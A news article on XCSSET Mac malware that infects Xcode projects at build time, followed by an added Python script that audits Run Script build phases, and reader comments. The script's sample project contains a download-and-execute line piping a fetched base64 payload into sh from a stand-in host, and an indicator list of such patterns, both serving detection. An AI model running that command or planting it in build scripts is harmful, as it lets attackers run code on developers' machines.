New Mac malware infects and spreads via Xcode projects
A number of Xcode projects have been found to contain malware that can attack Safari and other browsers, security researchers have revealed, with the discovery of XCSSET malware making its way into Mac software projects through largely unknown means.

Researchers at Trend Micro discovered what the company describes as "an unusual infection related to Xcode developer projects," in which the malware embeds itself in the project files themselves. The malware was found to have multiple payload possibilities, and though it poses a potential risk to end users of software built with Apple's IDE, it actually seems to be a bigger issue for the developers themselves.
The malware, which is part of the XCSSET family, was found to incorporate files that suggested it would enable "command and control" of a target system, namely that it would allow the attacker using the malware to take control of the infected Mac. This can allow for a wide variety of actions to be performed on infected systems, including acquiring personal data and performing a ransomware-style attack involving encryption.
The team suggests the unusual nature of the malware is from how it is being distributed, namely that it is being "injected into local Xcode projects so that when the project is built, the malicious code is run." It is unclear exactly how the code is being injected into the project at this time.
For developers who rely on collaborating with others, Trend Micro suggests the threat is worse when taking into account projects being shared via GitHub and other code repositories, as this could lead to "a supply-chain-like attack for users who rely on these repositories as dependencies in their own projects."
After being installed, the malware is able to attack Safari and other browsers on the Mac to acquire useful user data. Zero-day vulnerabilities discovered include an issue with Data Vault that bypasses macOS' System Integrity Protection feature, as well as one in Safari for WebKit Development that creates a fake Safari app that runs instead of the legitimate version.
So far, the malware has only been found in two Xcode projects, with the projects thought not to be widely used by other developers, severely limiting the impact. A list of 380 victim IP addresses was collected by the malware authors, with the vast bulk of infections made up of Macs in China and India.
Trend Micro recommends that project owners "continue to triple-check the integrity of their projects in order to definitely nip unwarranted problems such as a malware infection in the future."
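The article notes that the malicious code is "injected into local Xcode projects so that when the project is built, the malicious code is run", and that project owners should "triple-check the integrity of their projects". One mechanism by which an Xcode project can execute arbitrary shell commands at build time is a Run Script build phase, stored in the project's project.pbxproj file as a PBXShellScriptBuildPhase object. The following is an added example, not code from the article or from Trend Micro, of a small audit script that enumerates those build phases and flags scripts matching a heuristic indicator list (curl/wget, base64, piping into an interpreter, eval, osascript, xattr/chmod). The indicator list and the sample project fragment are constructed for illustration; the article does not state which injection mechanism XCSSET used, so this is a general integrity check for shared or downloaded projects rather than a detector for that specific family.

```python
import re

# Constructed sample project.pbxproj fragment (not from any real project):
# two Run Script build phases, one benign, one showing a download-and-execute
# pattern that a reviewer of a shared project would want flagged.
SAMPLE_PBXPROJ = r'''
/* Begin PBXShellScriptBuildPhase section */
		A1B2C3D4E5F60718293A4B5C /* Lint */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			name = "Lint";
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "if which swiftlint >/dev/null; then swiftlint; fi\n";
		};
		0F1E2D3C4B5A69788796A5B4 /* ShellScript */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "echo \"build\"\ncurl -s http://example.invalid/p.txt | base64 -d | sh\n";
		};
/* End PBXShellScriptBuildPhase section */
'''

# Matches one PBXShellScriptBuildPhase object: 24-hex object id, optional
# /* comment */, then the body up to the closing "};".
PHASE_RE = re.compile(
    r'([0-9A-F]{24})\s*(?:/\*.*?\*/)?\s*=\s*\{\s*isa = PBXShellScriptBuildPhase;(.*?)\};',
    re.S,
)
SCRIPT_RE = re.compile(r'shellScript = "((?:[^"\\]|\\.)*)";', re.S)

# Heuristic indicators (an assumption of this example, not a published rule set).
SUSPICIOUS = [
    (r'\bcurl\b|\bwget\b', 'fetches remote content'),
    (r'\bbase64\b', 'decodes a base64 payload'),
    (r'\|\s*(sh|bash|zsh|python[23]?|perl|osascript)\b', 'pipes data into an interpreter'),
    (r'\beval\b', 'evaluates a dynamically built command'),
    (r'\bosascript\b', 'runs AppleScript'),
    (r'\bxattr\b|\bchmod\s+\+x', 'alters file attributes or permissions'),
]


def _unescape(s):
    """Undo pbxproj string escaping: \\n, \\t, \\" and \\\\."""
    return re.sub(r'\\(.)', lambda m: {'n': '\n', 't': '\t'}.get(m.group(1), m.group(1)), s)


def _field(body, key):
    """Return a simple (quoted or bare) scalar field from an object body, or None."""
    m = re.search(r'\b' + key + r' = (?:"([^"]*)"|([^;]+));', body)
    return (m.group(1) if m.group(1) is not None else m.group(2).strip()) if m else None


def extract_script_phases(pbxproj_text):
    """Return a list of dicts describing every Run Script build phase in the file."""
    phases = []
    for m in PHASE_RE.finditer(pbxproj_text):
        obj_id, body = m.group(1), m.group(2)
        sm = SCRIPT_RE.search(body)
        phases.append({
            'id': obj_id,
            'name': _field(body, 'name') or '(unnamed)',
            'shell': _field(body, 'shellPath') or '/bin/sh',
            # 0 means the script runs on every build, not only on deployment builds
            'every_build': _field(body, 'runOnlyForDeploymentPostprocessing') == '0',
            'script': _unescape(sm.group(1)) if sm else '',
        })
    return phases


def audit_script_phases(pbxproj_text):
    """Annotate each phase with the indicator descriptions its script matched."""
    findings = []
    for phase in extract_script_phases(pbxproj_text):
        reasons = [why for pat, why in SUSPICIOUS if re.search(pat, phase['script'], re.M)]
        findings.append({**phase, 'suspicious': bool(reasons), 'reasons': reasons})
    return findings


if __name__ == '__main__':
    for f in audit_script_phases(SAMPLE_PBXPROJ):
        status = 'REVIEW' if f['suspicious'] else 'ok'
        print(f"[{status}] {f['id']} {f['name']!r} shell={f['shell']} every_build={f['every_build']}")
        for why in f['reasons']:
            print(f"         - {why}")
```

Running the script against a real project would mean reading `project.pbxproj` from inside the `.xcodeproj` bundle instead of `SAMPLE_PBXPROJ`; the same check is worth running in CI on every pull request so that a newly added or modified Run Script phase is reviewed before anyone builds the project.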

Comments
Beginning to look like an all-out war on Apple because Apple chose to finally dump Intel
Of course, I’m just a conspiracy theorist.....
TSMC decided to stop selling to Chinese firms, and so people left (or were poached)
Xcode malware has more to do with downloading unverified Xcode projects. Probably via tutorial website. Considering most infections are in India & China.
Anti-trust cases are absolutely deserved. I should be able to decide what apps I install on MY phone, not Apple.
Dump Intel, yeah I doubt that. Maybe some fanboys and creative people will buy ARM. Rest of us, ain't touching it with a stick.
It's just that Apple has become the big boy now and so it's getting attention. The iPhone just got owned recently. Including its so-called "secure enclave"
NO one on earth cares about Intel CPUs.
And pay the price in malware.
Malware is a pretty broad category from simply scamming an ad network (adware), to irritating pop-up stuff to truly malicious, but still I've not ever encountered it in any form on any device I've used since buying the Verizon Droid 11 years ago, nor has any of my immediate family and the dozen+ devices purchased. TBH I've not ever heard of anyone I personally know encountering any truly malicious malware, with the worst I have knowledge of being a single piece of adware someone I knew had found some years ago and yes that was pretty irritating.
Android malware is really not at all common, and actually harmful stuff exceedingly rare to the point it essentially doesn't exist as a menace to the vast majority of users. Our 2 primary mobile OSes are very secure, and viruses like those found on desktop systems don't even exist.
On the other hand it may reinforce Apple's assertion that a regulated App Store is the only way to ensure that virus and worms don't get into third party apps.
Edit: Huh. Refresh the page and it shows properly. That’s still a bug, though, like all the “breaks autocomplete/autocorrect” bugs on new lines.